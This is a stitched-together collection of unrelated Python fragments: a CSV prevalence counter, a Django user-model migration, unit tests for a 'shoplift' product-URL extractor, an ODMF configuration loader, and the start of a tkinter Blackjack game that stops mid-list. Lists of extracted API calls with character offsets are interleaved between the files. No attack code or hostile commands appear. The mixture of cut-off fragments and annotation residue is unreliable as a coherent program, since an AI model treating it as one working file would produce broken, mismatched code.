'(genome2)\n', (2385, 2394), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((2448, 2458), 'sys.exit', 'sys.exit', ([], {}), '()\n', (2456, 2458), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((2487, 2511), 'os.path.isfile', 'os.path.isfile', (['blastout'], {}), '(blastout)\n', (2501, 2511), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((2641, 2651), 'sys.exit', 'sys.exit', ([], {}), '()\n', (2649, 2651), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((3373, 3394), 'os.path.isfile', 'os.path.isfile', (['fpath'], {}), '(fpath)\n', (3387, 3394), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((3399, 3424), 'os.access', 'os.access', (['fpath', 'os.X_OK'], {}), '(fpath, os.X_OK)\n', (3408, 
3424), False, 'import sys, os, subprocess, glob, csv, collections\n'), ((3615, 3642), 'os.path.join', 'os.path.join', (['path', 'program'], {}), '(path, program)\n', (3627, 3642), False, 'import sys, os, subprocess, glob, csv, collections\n')] |
"""
This is a simplified version to find statistical prevalence that counts instances and is numerically equivalent
to the confidence metric in association rules (# of occurrences / total occurrences).
"""
import csv
def count_stuff(filename):
"""
Counts instances and sorts them by prevalence
Parameters
----------
filename : string
A .csv file of a SQL query
Returns
-------
comb_sort
Returns a dictionary of function and flow combinations sorted by prevalence. The key is the
component and the value is a list of type: [function-flow, statistical prevalence]
"""
# Combinations of components, functions, and/or flows are stored in a dictionary with the first column
# as the key and the second column as the value
combos = {}
# Instances of each item in the columns are counted for later analysis
counts = {}
with open(filename, encoding='utf-8-sig') as input_file:
for row in csv.reader(input_file, delimiter=','):
# By convention, the first column is the component and the second column is the function and/or flow
comp = row[0]
func = row[1]
# Create a dictionary with a count of instances of each component
if comp not in counts:
counts[comp] = 1
else:
counts[comp] += 1
# Create a dictionary that tracks the number of times a component has a function and/or flow
if comp not in combos:
combos[comp] = {}
combos[comp][func] = 1
else:
if func not in combos[comp]:
combos[comp][func] = 1
else:
combos[comp][func] += 1
# (1) Convert the dictionary of a dictionary to a dictionary of lists for sorting then (2) divide the functions
# and/or flows for each component by the total number of component instances to get the percentage
# of each combination and (3) sort the dictionary by the percentages of each combination.
# (1) Convert
comb_sort = {}
for cs, fs in combos.items():
for k, v in combos[cs].items():
# (2) Divide
comb_sort.setdefault(cs, []).append([k, v / counts[cs]])
# (3) Sort
for k, v in comb_sort.items():
v.sort(key=lambda x: x[1], reverse=True)
return comb_sort
| [
"csv.reader"
] | [((1024, 1061), 'csv.reader', 'csv.reader', (['input_file'], {'delimiter': '""","""'}), "(input_file, delimiter=',')\n", (1034, 1061), False, 'import csv\n')] |
# Generated by Django 3.0.5 on 2020-09-06 20:28
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='user',
name='bio',
field=models.TextField(blank=True, max_length=500, verbose_name='description'),
),
migrations.AlterField(
model_name='user',
name='email',
field=models.EmailField(max_length=40, unique=True, verbose_name='email'),
),
migrations.AlterField(
model_name='user',
name='role',
field=models.CharField(default='user', max_length=30, verbose_name='role'),
),
migrations.AlterField(
model_name='user',
name='token',
field=models.CharField(blank=True, max_length=36, verbose_name='token'),
),
]
| [
"django.db.models.EmailField",
"django.db.models.TextField",
"django.db.models.CharField"
] | [((318, 390), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)', 'max_length': '(500)', 'verbose_name': '"""description"""'}), "(blank=True, max_length=500, verbose_name='description')\n", (334, 390), False, 'from django.db import migrations, models\n'), ((509, 576), 'django.db.models.EmailField', 'models.EmailField', ([], {'max_length': '(40)', 'unique': '(True)', 'verbose_name': '"""email"""'}), "(max_length=40, unique=True, verbose_name='email')\n", (526, 576), False, 'from django.db import migrations, models\n'), ((694, 762), 'django.db.models.CharField', 'models.CharField', ([], {'default': '"""user"""', 'max_length': '(30)', 'verbose_name': '"""role"""'}), "(default='user', max_length=30, verbose_name='role')\n", (710, 762), False, 'from django.db import migrations, models\n'), ((881, 946), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(36)', 'verbose_name': '"""token"""'}), "(blank=True, max_length=36, verbose_name='token')\n", (897, 946), False, 'from django.db import migrations, models\n')] |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import os
import unittest
import ConfigParser
from textwrap import dedent
from StringIO import StringIO
from mock import MagicMock, patch
from shoplift.config import *
from shoplift.exceptions import ConfigDoesNotExistException
BASE_CONFIG_TESTFILE = os.path.join(os.path.dirname(__file__), 'test_config.ini')
# Final output after parsing amazon_config_testdata.ini file and contents
product_output = {
'amazon': {
CONFIG_KEY_URL: {
CONFIG_KEY_DOMAINS: ['amazon', 'junglee'],
CONFIG_KEY_PATHS: '/.*/dp/.*/.*',
},
'price': { CONFIG_KEY_METHOD: 'amazon_api.price_and_currency' },
'image_url':{ CONFIG_KEY_METHOD: 'amazon_api.large_image_url' },
'name': { CONFIG_KEY_METHOD: 'amazon_api.title' }
}
}
class TestExtractor(unittest.TestCase):
def setUp(self):
self.extractor = Extractor(BASE_CONFIG_TESTFILE)
self.maxDiff = None
for name, config in self.extractor.platforms.iteritems():
if name == 'flipkart':
self.flipkart_platform = (name, config)
elif name == 'amazon.com':
self.amazon_platform = (name, config)
elif name == 'itunes':
self.itunes_platform = (name, config)
elif name == 'apple':
self.apple_platform = (name, config)
def testCommaSeparatedToList(self):
'''Test for comma separated entities in the...
config file and returns them as expected
'''
# Input data for testing comma separated domain and path names
comma_separated_input = dedent("""
[flipkart]
url.domains = flipkart, flip.kart, flipkar.t, .flipkart, www.flipkart.com, flip-kart
url.path = (.*/dp/.*/.8)|(/uaa/.*/.*/.*)|(/a/.*/.*)
""")
# Final result list of comma separated domain names
comma_separated_output = {
'flipkart': {
CONFIG_KEY_URL: {
CONFIG_KEY_DOMAINS: [
'flipkart',
'flip.kart',
'flipkar.t',
'.flipkart',
'www.flipkart.com',
'flip-kart'
],
CONFIG_KEY_PATHS: '(.*/dp/.*/.8)|(/uaa/.*/.*/.*)|(/a/.*/.*)'
},
}
}
comma_separated_ins_input = StringIO(comma_separated_input)
extractor_comma = Extractor(comma_separated_ins_input)
comma_to_list_product = extractor_comma.platforms
self.assertEqual(comma_to_list_product, comma_separated_output)
comma_separated_input0 = dedent("""
[ebay]
url.domains = ebay.com
url.path = *.////\s([^abc])
""")
comma_separated_output0 = {
'ebay': {
CONFIG_KEY_URL: {
CONFIG_KEY_DOMAINS: ['ebay.com'],
CONFIG_KEY_PATHS: '*.////\s([^abc])'
},
}
}
comma_separated_ins_input0 = StringIO(comma_separated_input0)
extractor_comma0 = Extractor(comma_separated_ins_input0)
comma_to_list_product0 = extractor_comma0.platforms
self.assertEqual(comma_to_list_product0, comma_separated_output0)
def testConfigParserString(self):
'''Test for config parser method in case...
the input config is string
'''
# String testdata input
string_input = dedent("""
[amazon]
url.path = /.*/dp/.*/.*
url.domains = amazon, junglee
image_url = amazon_api.large_image_url
name = amazon_api.title
price = amazon_api.price_and_currency
""")
string_ins_input = StringIO(string_input)
extractor = Extractor(string_ins_input)
string_config_output = extractor.platforms
self.assertEqual(string_config_output, product_output)
def testConfigParserFile(self):
'''Test for parsing config file
'''
testfile_config = Extractor(os.path.join(os.path.dirname(__file__), 'amazon_config_testdata.ini'))
testfile_output = testfile_config.platforms
self.assertEqual(testfile_output, product_output)
def testConfigParserFail(self):
'''Test for failing in reading config file ...
in case it is in invalid format or not present
'''
self.assertRaises(ConfigDoesNotExistException, Extractor, 'test.yaml')
def testInvalidConfigKeyHandling(self):
'''Test for exception handling in case of invalid keys
The keys url.path and url.domains are required config
for a platform. Platform configs where these are missing
should be ignored
'''
cases = (
( # Invalid only
dedent("""
[amazon]
domain = amaz.on
path = xyz
"""),
{}
),
( # Invalid followed by valid
dedent("""
[amaz.on]
domains = amaz.on
urlpath = xyz
[amazon]
url.domains = amazon.com
url.path = xyz
"""),
{ 'amazon': { CONFIG_KEY_URL: {
CONFIG_KEY_DOMAINS: ['amazon.com'],
CONFIG_KEY_PATHS: 'xyz',
}}}
),
( # 2 valids followed by an invalid
dedent("""
[amazon]
url.domains = amazon.com
url.path = xyz
[flipkart]
url.domains = flipkart.com
url.path = flipped
[amaz.on]
domain = amaz.on
path = xyz
"""),
{
'amazon': { CONFIG_KEY_URL: {
CONFIG_KEY_DOMAINS: ['amazon.com'],
CONFIG_KEY_PATHS: 'xyz',
}},
'flipkart': { CONFIG_KEY_URL : {
CONFIG_KEY_DOMAINS: ['flipkart.com'],
CONFIG_KEY_PATHS: 'flipped',
}}
}
),
)
for testcase, expected_result in cases:
self.assertDictEqual(Extractor(StringIO(testcase)).platforms, expected_result)
def testValidGetPlatform(self):
'''Testing different supported platforms
Test for valid url and then the result...
i.e, returning supported platform for ...
valid url
'''
platform = self.extractor.get_platform('http://www.amazon.com/Crosley-CR8005A-BL-Cruiser-Portable-Turntable/dp/B008P8ELAE/ref=sr_1_8?m=A21C4U5X700J66&s=aht&ie=UTF8&qid=1402383743&sr=1-8')
self.assertIsNotNone(platform)
self.assertEqual(platform, self.amazon_platform)
platform = self.extractor.get_platform('http://www.flipkart.com/dc-comics-printed-men-s-round-neck-t-shirt/p/itmdvgwnbbhpf9gu?pid=TSHDVGWHMMHHFNNE&srno=b_4&ref=d3ab4e88-53b7-4ed9-899a-1d5fc76c3514')
self.assertIsNotNone(platform)
self.assertEqual(platform, self.flipkart_platform)
platform = self.extractor.get_platform('flipkart.com/dc-comics-printed-men-s-round-neck-t-shirt/p/itmdvgwnbbhpf9gu?pid=TSHDVGWHMMHHFNNE&srno=b_4&ref=d3ab4e88-53b7-4ed9-899a-1d5fc76c3514')
self.assertIsNotNone(platform)
self.assertEqual(platform, self.flipkart_platform)
platform = self.extractor.get_platform('//www.amazon.com/Crosley-CR8005A-BL-Cruiser-Portable-Turntable/dp/B008P8ELAE/ref=sr_1_8?m=A21C4U5X700J66&s=aht&ie=UTF8&qid=1402383743&sr=1-8')
self.assertIsNotNone(platform)
self.assertEqual(platform, self.amazon_platform)
platform = self.extractor.get_platform('://itunes.apple.com/in/album/ar.rahman-hits/id872316282')
self.assertIsNotNone(platform)
self.assertEqual(platform, self.itunes_platform)
platform = self.extractor.get_platform('http://store.apple.com/us/buy-appletv/appletv')
self.assertIsNotNone(platform)
self.assertEqual(platform, self.apple_platform)
platform = self.extractor.get_platform(' http://store.apple.com/us/buy-appletv/appletv ')
self.assertIsNotNone(platform)
self.assertEqual(platform, self.apple_platform)
platform = self.extractor.get_platform('http://www.flipkart.com/apple-16gb-ipad-mini-wi-fi/p/itmdwptvje38mfkh?pid=TABDFWGGVJZ4YHZM&srno=b_2&ref=bcc2c663-54f6-4155-a93c-bccfc62488f6')
self.assertIsNotNone(platform)
self.assertEqual(platform, self.flipkart_platform)
platform = self.extractor.get_platform('https://itunes.apple.com/in/album/maaloom-from-lekar-hum-deewana/id880141533')
self.assertIsNotNone(platform)
self.assertEqual(platform, self.itunes_platform)
platform = self.extractor.get_platform('http://store.apple.com/us/buy-ipad/ipad-air/64gb-silver-wifi?aid=www-k2-ipad+air+-+index-n%40p&cp=k2-ipad+air+-n%40p')
self.assertIsNotNone(platform)
self.assertEqual(platform, self.apple_platform)
platform = self.extractor.get_platform('http://www.amazon.com/Denon-AVR-E300-Channel-Networking-Receiver/dp/B00B7X2OV2/ref=lp_281056_1_3?s=tv&ie=UTF8&qid=1402390122&sr=1-3')
self.assertIsNotNone(platform)
self.assertEqual(platform, self.amazon_platform)
platform = self.extractor.get_platform('http://store.apple.com/us/product/HA895LL/A/nest-learning-thermostat-2nd-generation?fnode=a79a99869a5fd6441d07af7100325defd98d5dc502fac468a84ce72c63b91861ec5e707b1ca3af4fc9b7bfeb3ab050274397db7543a1712d5600fd3905eb4e682ad4682763d0908859bb31d02a930480fa862da590992c35f83d72c47a61e7831a1dea5a541bb02c5d84cc287e507189')
self.assertIsNotNone(platform)
self.assertEqual(platform, self.apple_platform)
platform = self.extractor.get_platform('http://www.flipkart.com/flippd-men-s-checkered-casual-shirt/p/itmdtsh62kgrczfw?ayuhs/p/ayush/ayush')
self.assertIsNotNone(platform)
self.assertEqual(platform, self.flipkart_platform)
# Test for a path match in the query string
query_test_extractor = Extractor(StringIO(dedent("""
[example]
url.domains = example.com
url.path = id=\d+
""")))
query_test_platform = ('example', query_test_extractor.platforms['example'])
query_test_url = 'http://example.com/something/in/the/path?query=string&id=345&nice'
platform = query_test_extractor.get_platform(query_test_url)
self.assertIsNotNone(platform)
self.assertEqual(platform, query_test_platform)
def testInvalidGetPlatform(self):
'''Tests for Invalid url
Checking the invalid urls and their return...
value which should be None for invalid urls
'''
self.assertIsNone(self.extractor.get_platform('http://www.flipkart.com/mens-clothing/t-shirts/pr?p[]=facets.type[]=Round%2BNeck&p[]=sort:popularity&sid=2oq,s9b,j9y&facetOrder[]=type&otracker=ch_vn_tshirts_me_subcategory_Round%20Neck#jumpTo=0|15'))
self.assertIsNone(self.extractor.get_platform('ayush'))
self.assertIsNone(self.extractor.get_platform('/www.flipkart.com/puma-solid-men-s-round-neck-t-shirt/p/itmdvfxctgsrbrdx?pid=TSHDVFWXGRCE8GYF&srno=b_6&ref=1761106e-e0f8-4a44-9fda-be55939634c2'))
self.assertIsNone(self.extractor.get_platform('http://www.amazon.com/s/'))
self.assertIsNone(self.extractor.get_platform('https://www.apple.com/itunes/'))
self.assertIsNone(self.extractor.get_platform(1234))
self.assertIsNone(self.extractor.get_platform(str))
self.assertIsNone(self.extractor.get_platform('<EMAIL>'))
self.assertIsNone(self.extractor.get_platform('http://www.amazon.com/puma-solid-men-s-round-neck-t-shirt/p/itmdvfxctgsrbrdx'))
self.assertIsNone(self.extractor.get_platform('http://www.facebook.com/pink-floyd-printed-men-s-round-neck-t-shirt/p/itmdz46ubth869nz?pid=TSHDZ46T7QZGJSFS&srno=b_9&ref=040d98ab-ea8c-466d-86bb-f9bd5114231c'))
self.assertIsNone(self.extractor.get_platform(''))
def testExtract(self):
'''Test for checking if the right function call is made or not
Test for valid and invalid url that checks if the ...
invoke_extraction_method is called or not
'''
ref = Extractor(BASE_CONFIG_TESTFILE)
ref.invoke_extraction_method = MagicMock()
ref.extract('http://www.flipkart.com/hanes-solid-men-s-round-neck-t-shirt/p/itmdu4rcb6awun7j?pid=TSHDU4RCKUZSCZ8B&srno=b_2&ref=6a37b3b1-9d4d-43b7-a40d-868d5b897308')
self.assertTrue(ref.invoke_extraction_method.called)
ref.invoke_extraction_method = MagicMock()
ref.extract('http://store.apple.com/us/buy-ipad/ipad-air/64gb-silver-wifi?aid=www-k2-ipad+air+-+index-n%40p&cp=k2-ipad+air+-n%40p')
self.assertTrue(ref.invoke_extraction_method.called)
ref.invoke_extraction_method = MagicMock()
ref.extract('http://www.facebook.com/pink-floyd-printed-men-s-round-neck-t-shirt/p/itmdz46ubth869nz?pid=TSHDZ46T7QZGJSFS&srno=b_9&ref=040d98ab-ea8c-466d-86bb-f9bd5114231c')
self.assertFalse(ref.invoke_extraction_method.called)
ref.invoke_extraction_method = MagicMock()
ref.extract('//www.amazon.com/Crosley-CR8005A-BL-Cruiser-Portable-Turntable/dp/B008P8ELAE/ref=sr_1_8?m=A21C4U5X700J66&s=aht&ie=UTF8&qid=1402383743&sr=1-8')
self.assertTrue(ref.invoke_extraction_method.called)
ref.get_platform = MagicMock()
ref.extract('http://store.apple.com/us/buy-ipad/ipad-air/64gb-silver-wifi?aid=www-k2-ipad+air+-+index-n%40p&cp=k2-ipad+air+-n%40p')
ref.get_platform.assert_called_once_with('http://store.apple.com/us/buy-ipad/ipad-air/64gb-silver-wifi?aid=www-k2-ipad+air+-+index-n%40p&cp=k2-ipad+air+-n%40p')
@patch('shoplift.scrapers.opengraph')
def testinvoke_opengraph(self, mock_opengraph):
'''Test for invoke_extraction call
Test that checks if the correct scraper method has ...
called or not
'''
ext = Extractor(BASE_CONFIG_TESTFILE)
ext.invoke_extraction_method({ 'method': 'opengraph.title' }, 'http://www.flipkart.com/hanes-solid-men-s-round-neck-t-shirt/p/itmdu4rcb6awun7j?pid=TSHDU4RCKUZSCZ8B&srno=b_2&ref=6a37b3b1-9d4d-43b7-a40d-868d5b897308')
mock_opengraph.assert_called_with('http://www.flipkart.com/hanes-solid-men-s-round-neck-t-shirt/p/itmdu4rcb6awun7j?pid=TSHDU4RCKUZSCZ8B&srno=b_2&ref=6a37b3b1-9d4d-43b7-a40d-868d5b897308', 'title')
@patch('shoplift.filters.regex')
@patch('shoplift.scrapers.microdata')
def testinvoke_regex(self, mock_microdata, mock_regex):
'''Test for checking filter call'''
ext = Extractor(BASE_CONFIG_TESTFILE)
ext.invoke_extraction_method({ 'method': 'microdata.name', 'filter': 'regex.abc' }, 'ayush')
mock_microdata.assert_called_with('ayush', 'name')
mock_microdata.return_value = 'xyz'
ext.invoke_extraction_method({ 'method': 'microdata.name', 'filter': 'regex.abc' }, 'ayush')
mock_regex.assert_called_with('xyz', 'abc')
@patch('shoplift.filters.tuple')
@patch('shoplift.scrapers.xpath')
def testinvoke_tuple(self, mock_xpath, mock_tuple):
'''Test for checking tuple filter call'''
ext = Extractor(BASE_CONFIG_TESTFILE)
ext.invoke_extraction_method({ 'method': 'xpath.ay/asa*/c.*', 'filter': 'tuple.0' }, 'any_url')
mock_xpath.assert_called_with('any_url', 'ay/asa*/c.*')
mock_xpath.return_value = ('ayush', 123)
ext.invoke_extraction_method({ 'method': 'xpath.ay/asa*/c.*', 'filter': 'tuple.0' }, 'any_url')
mock_tuple.assert_called_with(('ayush', 123), '0')
if __name__ == "__main__":
unittest.main()
| [
"StringIO.StringIO",
"textwrap.dedent",
"mock.patch",
"os.path.dirname",
"unittest.main",
"mock.MagicMock"
] | [((314, 339), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (329, 339), False, 'import os\n'), ((14746, 14782), 'mock.patch', 'patch', (['"""shoplift.scrapers.opengraph"""'], {}), "('shoplift.scrapers.opengraph')\n", (14751, 14782), False, 'from mock import MagicMock, patch\n'), ((15488, 15519), 'mock.patch', 'patch', (['"""shoplift.filters.regex"""'], {}), "('shoplift.filters.regex')\n", (15493, 15519), False, 'from mock import MagicMock, patch\n'), ((15525, 15561), 'mock.patch', 'patch', (['"""shoplift.scrapers.microdata"""'], {}), "('shoplift.scrapers.microdata')\n", (15530, 15561), False, 'from mock import MagicMock, patch\n'), ((16098, 16129), 'mock.patch', 'patch', (['"""shoplift.filters.tuple"""'], {}), "('shoplift.filters.tuple')\n", (16103, 16129), False, 'from mock import MagicMock, patch\n'), ((16135, 16167), 'mock.patch', 'patch', (['"""shoplift.scrapers.xpath"""'], {}), "('shoplift.scrapers.xpath')\n", (16140, 16167), False, 'from mock import MagicMock, patch\n'), ((16743, 16758), 'unittest.main', 'unittest.main', ([], {}), '()\n', (16756, 16758), False, 'import unittest\n'), ((1703, 1920), 'textwrap.dedent', 'dedent', (['"""\n [flipkart]\n url.domains = flipkart, flip.kart, flipkar.t, .flipkart, www.flipkart.com, flip-kart\n url.path = (.*/dp/.*/.8)|(/uaa/.*/.*/.*)|(/a/.*/.*)\n """'], {}), '(\n """\n [flipkart]\n url.domains = flipkart, flip.kart, flipkar.t, .flipkart, www.flipkart.com, flip-kart\n url.path = (.*/dp/.*/.8)|(/uaa/.*/.*/.*)|(/a/.*/.*)\n """\n )\n', (1709, 1920), False, 'from textwrap import dedent\n'), ((2536, 2567), 'StringIO.StringIO', 'StringIO', (['comma_separated_input'], {}), '(comma_separated_input)\n', (2544, 2567), False, 'from StringIO import StringIO\n'), ((2803, 2931), 'textwrap.dedent', 'dedent', (['"""\n [ebay]\n url.domains = ebay.com\n url.path = *.////\\\\s([^abc])\n """'], {}), '(\n """\n [ebay]\n url.domains = ebay.com\n url.path = *.////\\\\s([^abc])\n """\n )\n', (2809, 2931), False, 
'from textwrap import dedent\n'), ((3222, 3254), 'StringIO.StringIO', 'StringIO', (['comma_separated_input0'], {}), '(comma_separated_input0)\n', (3230, 3254), False, 'from StringIO import StringIO\n'), ((3673, 3960), 'textwrap.dedent', 'dedent', (['"""\n [amazon]\n url.path = /.*/dp/.*/.*\n url.domains = amazon, junglee\n image_url = amazon_api.large_image_url\n name = amazon_api.title\n price = amazon_api.price_and_currency\n """'], {}), '(\n """\n [amazon]\n url.path = /.*/dp/.*/.*\n url.domains = amazon, junglee\n image_url = amazon_api.large_image_url\n name = amazon_api.title\n price = amazon_api.price_and_currency\n """\n )\n', (3679, 3960), False, 'from textwrap import dedent\n'), ((3978, 4000), 'StringIO.StringIO', 'StringIO', (['string_input'], {}), '(string_input)\n', (3986, 4000), False, 'from StringIO import StringIO\n'), ((13273, 13284), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (13282, 13284), False, 'from mock import MagicMock, patch\n'), ((13568, 13579), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (13577, 13579), False, 'from mock import MagicMock, patch\n'), ((13829, 13840), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (13838, 13840), False, 'from mock import MagicMock, patch\n'), ((14132, 14143), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (14141, 14143), False, 'from mock import MagicMock, patch\n'), ((14405, 14416), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (14414, 14416), False, 'from mock import MagicMock, patch\n'), ((4333, 4358), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (4348, 4358), False, 'import os\n'), ((5148, 5286), 'textwrap.dedent', 'dedent', (['"""\n [amazon]\n domain = amaz.on\n path = xyz\n """'], {}), '(\n """\n [amazon]\n domain = amaz.on\n path = xyz\n """\n )\n', (5154, 5286), False, 'from textwrap import dedent\n'), ((5372, 5645), 'textwrap.dedent', 'dedent', (['"""\n [amaz.on]\n domains = amaz.on\n urlpath = xyz\n \n [amazon]\n url.domains = amazon.com\n url.path = 
xyz\n """'], {}), '(\n """\n [amaz.on]\n domains = amaz.on\n urlpath = xyz\n \n [amazon]\n url.domains = amazon.com\n url.path = xyz\n """\n )\n', (5378, 5645), False, 'from textwrap import dedent\n'), ((5887, 6294), 'textwrap.dedent', 'dedent', (['"""\n [amazon]\n url.domains = amazon.com\n url.path = xyz\n \n [flipkart]\n url.domains = flipkart.com\n url.path = flipped\n \n [amaz.on]\n domain = amaz.on\n path = xyz\n """'], {}), '(\n """\n [amazon]\n url.domains = amazon.com\n url.path = xyz\n \n [flipkart]\n url.domains = flipkart.com\n url.path = flipped\n \n [amaz.on]\n domain = amaz.on\n path = xyz\n """\n )\n', (5893, 6294), False, 'from textwrap import dedent\n'), ((10864, 10988), 'textwrap.dedent', 'dedent', (['"""\n [example]\n url.domains = example.com\n url.path = id=\\\\d+\n """'], {}), '(\n """\n [example]\n url.domains = example.com\n url.path = id=\\\\d+\n """\n )\n', (10870, 10988), False, 'from textwrap import dedent\n'), ((6821, 6839), 'StringIO.StringIO', 'StringIO', (['testcase'], {}), '(testcase)\n', (6829, 6839), False, 'from StringIO import StringIO\n')] |
# Parse conf.py in the root directory and check for validity
#
# A more detailed explanation of a valid configuration can be found
# in the documentation
#
import yaml
from pathlib import Path
import sys
import os
from logging import getLogger
from . import prefix, __version__
logger = getLogger(__name__)
class ConfigurationError(RuntimeError):
pass
def static_locations(*from_config):
paths = [Path(__file__).parent / 'static'] + [Path(p) for p in from_config]
filtered = []
[filtered.append(str(p)) for p in paths if p and p.exists() and p not in filtered]
return filtered
class Configuration:
"""
The configuration class. Change the configuration by providing a config.yml in the home directory
Mandatory fields are defined as (...), optional as None or with a default value
"""
datetime_default_timezone = 'Europe/Berlin'
database_type = 'postgres'
database_name = ''
database_username = ''
database_password = ''
database_host = '127.0.0.1'
static = [prefix]
media_image_path = 'webpage/media'
nav_background = '/media/gladbacherhof.jpg'
nav_left_logo = '/media/lfe-logo.png'
manual_measurements_pattern = '(.+\\/)*datafiles\\/lab\\/([a-zA-Z0-9]+\\/)*.*\\.(xls|xlsx)$'
map_default = {'lat': 50.5, 'lng': 8.55, 'type': 'hybrid', 'zoom': 15}
utm_zone = '32N'
upload_max_size = 25000000
server_port = 8080
google_maps_api_key = ''
woftester_receiver_mail = ['<EMAIL>']
woftester_sender_mail = '<EMAIL>'
cuahsi_wsdl_endpoint = 'http://fb09-pasig.umwelt.uni-giessen.de/wof/index.php/cuahsi_1_1.asmx?WSDL'
smtp_serverurl = 'mailout.uni-giessen.de'
root_url = '/'
datafiles = './datafiles'
preferences = './preferences'
description = 'A server for data-management for quantitative field research'
user = os.environ.get('USER') or os.environ.get('USERNAME')
def __bool__(self):
return ... not in vars(self).values()
def to_dict(self):
return {
k: v
for k, v in vars(self).items()
if (
not callable(v)
and not k.startswith('_')
and type(v) is not property
)
}
def update(self, conf_dict: dict):
unknown_keys = []
for k in conf_dict:
if hasattr(self, k):
setattr(self, k, conf_dict[k])
else:
unknown_keys.append(k)
if unknown_keys:
raise ConfigurationError(f'Your configuration contains unknown keys: {",".join(unknown_keys)}')
return self
def __init__(self, **kwargs):
vars(self).update({
k: v
for k, v in vars(type(self)).items()
if not k.startswith('_') and not callable(v)
})
self.update(kwargs)
self.home = str(Path(prefix).absolute())
self.static = static_locations(self.home, *self.static)
def abspath(self, relative_path: Path):
"""
Returns a pathlib.Path from the first fitting static location
:param relative_path: A relative path to a static ressource
"""
for static_home in reversed(self.static):
p = Path(static_home) / relative_path
if p.exists():
return p.absolute()
raise FileNotFoundError(f'{relative_path} not found in the static ressources')
def to_yaml(self, stream=sys.stdout):
"""
Exports the current configuration to a yaml file
:param stream: A stream to write to
"""
d = self.to_dict()
yaml.safe_dump(d, stream)
def google_maps_api(self, callback: str):
return f'https://maps.googleapis.com/maps/api/js?key={self.google_maps_api_key}&callback={callback}'
@property
def version(self):
return __version__
def load_config():
conf_file = Path(prefix) / 'config.yml'
logger.debug('Found config file:' + str(conf_file.absolute()))
if not conf_file.exists():
logger.warning(f'{conf_file.absolute().as_posix()} '
f'not found. Create a template with "odmf configure". Using incomplete configuration')
conf_dict = {}
else:
conf_dict = yaml.safe_load(conf_file.open()) or {}
logger.debug(f'loaded {conf_file.resolve()}')
conf = Configuration(**conf_dict)
if not conf:
logger.warning(', '.join(k for k, v in conf.to_dict().items() if v is ...) + ' are undefined')
return conf
def import_module_configuration(conf_module_filename):
"""
Migration utitlity to create a conf.yaml from the old ODMF 0.x conf.py module configuration
:param conf_module_filename: The conf.py configuration file
"""
code = compile(open(conf_module_filename).read(), 'conf.py', 'exec')
config = {}
exec(code, config)
def c(s: str):
return s.replace('CFG_', '').lower()
config = {
c(k): v
for k, v in config.items()
if k.upper() == k and k[0] != '_' and not callable(v)
}
config['database_type'] = config.pop('database', 'postgres')
conf = Configuration(**config)
return conf
conf = load_config()
| [
"logging.getLogger",
"yaml.safe_dump",
"os.environ.get",
"pathlib.Path"
] | [((291, 310), 'logging.getLogger', 'getLogger', (['__name__'], {}), '(__name__)\n', (300, 310), False, 'from logging import getLogger\n'), ((1853, 1875), 'os.environ.get', 'os.environ.get', (['"""USER"""'], {}), "('USER')\n", (1867, 1875), False, 'import os\n'), ((1879, 1905), 'os.environ.get', 'os.environ.get', (['"""USERNAME"""'], {}), "('USERNAME')\n", (1893, 1905), False, 'import os\n'), ((3635, 3660), 'yaml.safe_dump', 'yaml.safe_dump', (['d', 'stream'], {}), '(d, stream)\n', (3649, 3660), False, 'import yaml\n'), ((3919, 3931), 'pathlib.Path', 'Path', (['prefix'], {}), '(prefix)\n', (3923, 3931), False, 'from pathlib import Path\n'), ((451, 458), 'pathlib.Path', 'Path', (['p'], {}), '(p)\n', (455, 458), False, 'from pathlib import Path\n'), ((3248, 3265), 'pathlib.Path', 'Path', (['static_home'], {}), '(static_home)\n', (3252, 3265), False, 'from pathlib import Path\n'), ((414, 428), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (418, 428), False, 'from pathlib import Path\n'), ((2886, 2898), 'pathlib.Path', 'Path', (['prefix'], {}), '(prefix)\n', (2890, 2898), False, 'from pathlib import Path\n')] |
import random
import tkinter
import math
class Blackjack():
def __init__(self, master):
#Menu
glavniMenu = tkinter.Menu(master)
master.config(menu = glavniMenu)
menuBJ = tkinter.Menu(glavniMenu)
glavniMenu.add_cascade(label = 'Blackjack', menu=menuBJ)
menuBJ.add_cascade(label = 'New Game', command = self.newGame)
menuBJ.add_cascade(label = 'Quit', command = master.destroy)
#zeleno platno (igralna povrsina)
self.platno = tkinter.Canvas(master, width = 700, height = 480, bg = 'green')
self.platno.grid(row = 0, column = 0)
#Crte
self.pokoncaCrta = self.platno.create_line(500, 0, 500, 600, width = 4)
self.lezecaCrta = self.platno.create_line(0, 410, 500, 410, width = 4)
#####Spremenljivke
self.sezKart = ['karte/1.gif', 'karte/2.gif', 'karte/3.gif', 'karte/4.gif', 'karte/5.gif',
'karte/6.gif', 'karte/7.gif', 'karte/8.gif', 'karte/9.gif', 'karte/10.gif',
'karte/11.gif', 'karte/12.gif', 'karte/13.gif', 'karte/4.gif', 'karte/15.gif',
'karte/16.gif', 'karte/17.gif', 'karte/18.gif', 'karte/19.gif', 'karte/20.gif',
'karte/21.gif', 'karte/22.gif', 'karte/23.gif', 'karte/24.gif', 'karte/25.gif',
'karte/26.gif', 'karte/27.gif', 'karte/28.gif', 'karte/29.gif', 'karte/30.gif',
'karte/31.gif', 'karte/32.gif', 'karte/33.gif', 'karte/34.gif', 'karte/35.gif',
'karte/36.gif', 'karte/37.gif', 'karte/38.gif', 'karte/39.gif', 'karte/40.gif',
'karte/41.gif', 'karte/42.gif', 'karte/43.gif', 'karte/44.gif', 'karte/45.gif',
